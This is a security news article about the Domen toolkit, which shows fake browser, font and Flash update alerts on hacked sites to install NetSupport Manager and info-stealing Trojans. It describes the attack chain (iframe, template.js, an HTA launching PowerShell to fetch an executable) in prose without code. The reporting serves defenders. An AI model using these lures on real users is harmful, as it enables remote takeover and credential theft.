A new social engineering toolkit called Domen has been discovered that uses fake browser and program update alerts on compromised sites to infect users with malware and remote access software.
Attackers using fake browser and flash player update alerts to spread malware is nothing new but this new toolkit discovered by Malwarebytes researcher Jérôme Segura has a high level of sophistication and customization that allows it to adapt to different clients, browsers, and visitors.
When loaded on a compromised site, the Domen toolkit will display a variety of alerts that overlay the site’s legitimate content. These fake alerts are designed to trick users into downloading the “update”, executing it, and infecting themselves with a payload of the attacker’s choice.
“Loaded as an iframe from compromised websites (most of them running WordPress) and displayed over top as an additional layer, it entices victims to install so-called updates that instead download the NetSupport remote administration tool,” Segura stated in his report. “In this blog we describe its tactics, techniques and procedures (TTPs) that remind us of some past and current social engineering campaigns.”
When someone accesses a hacked site that is using the Domen toolkit, the browser will open an iframe to another site, which in this particular attack is located at chrom-update.online. This iframe will include a large ~280 KB script called template.js that is loaded into the browser.
The template.js is the main file for the toolkit and includes all logic that determines what type of alert is going to be displayed, user agents that will be blocked, and the HTML and CSS used for the overlays. All images that are shown in the fake update overlays are hosted on imgur.com, which allows this script to be extremely portable.
For example, if the banner variable is set to to 1, it will display a fake browser update alert.
If the banner value is set to 2, though, it would instead display a fake PT Sans not found alert that prompts you to download and install a browser “font pack”. The below font may look similar to the EITest Chrome HoeflerText Font Update alert, but Segura told BleepingComputer that they are not related and this is just an immitation.
Finally, if the banner value is set to 3, though, it would instead display a fake Flash alert that prompts you to download and install an update for the program.
In addition to the variety of banners that can be displayed, Domen also supports 30 different languages and is designed for both desktop and mobile visitors. This allows the script to target a variety of different visitors that may visit a compromised site.
As this toolkit is contained in a single file, Segura feels that this makes the Domen toolkit unique as it allows individual attackers to customize it and create their own unique experience, including different payloads.
“What makes the Domen toolkit unique is that it offers the same fingerprinting (browser, language) and choice of templates thanks to a client-side (template.js) script which can be tweaked by each threat actor. Additionally, the breadth f possible customizations is quite impressive since it covers a range of browsers, desktop and mobile in about 30 different languages.”
While it is not known how many different sites are currently utilizing this toolkit, it is possible to track the amount of visitors for the particular campaign discovered by Segura.
Segura noticed that one of the URLs contacted when the toolkit is used will report back the amount of unique visitors that was shown one of the Domen alerts. At the time of this writing, BleepingComputer saw that the visitor count was over 111k.
If other bad actors are using this script for their own campaigns, this count could be much higher.
When a user downloads the update offered by these fake alerts, a file called download.hta will be downloaded.
When executed, the download.hta file will launch a PowerShell command that downloads a file from a remote site, saves it to %Temp%jscheck.exe, and then executes it.
When executed, the NetSupport Manager program will be installed, which allows the attacker to remotely take over the infected computer. This includes taking screenshots, executing commands, and uploading and downloading files.
NetSupport Manager is a legitimate remote management software that is commonly installed by attackers to take control over a victim’s computer. Due to this, most security software should detect it in some manner if it is installed.
If you find that this process is running on your computer without your knowledge, then you should consider your computer and your login credentials compromised by an attacker.
Unfortunately, it is not only NetSupport Manager being installed using this toolkit!
Security researcher mol69 has found other campaigns utilizing the Domen toolkit that push Amadey, Raccon, and the Predator the Thief Trojans.
Some of these campaigns are incorporating the template.js file into other JavaScript files used by the hacked sites in order to make it harder to detect.
With the amount of campaigns currently being discovered that use this toolkit, we should expect to see their usage increasing.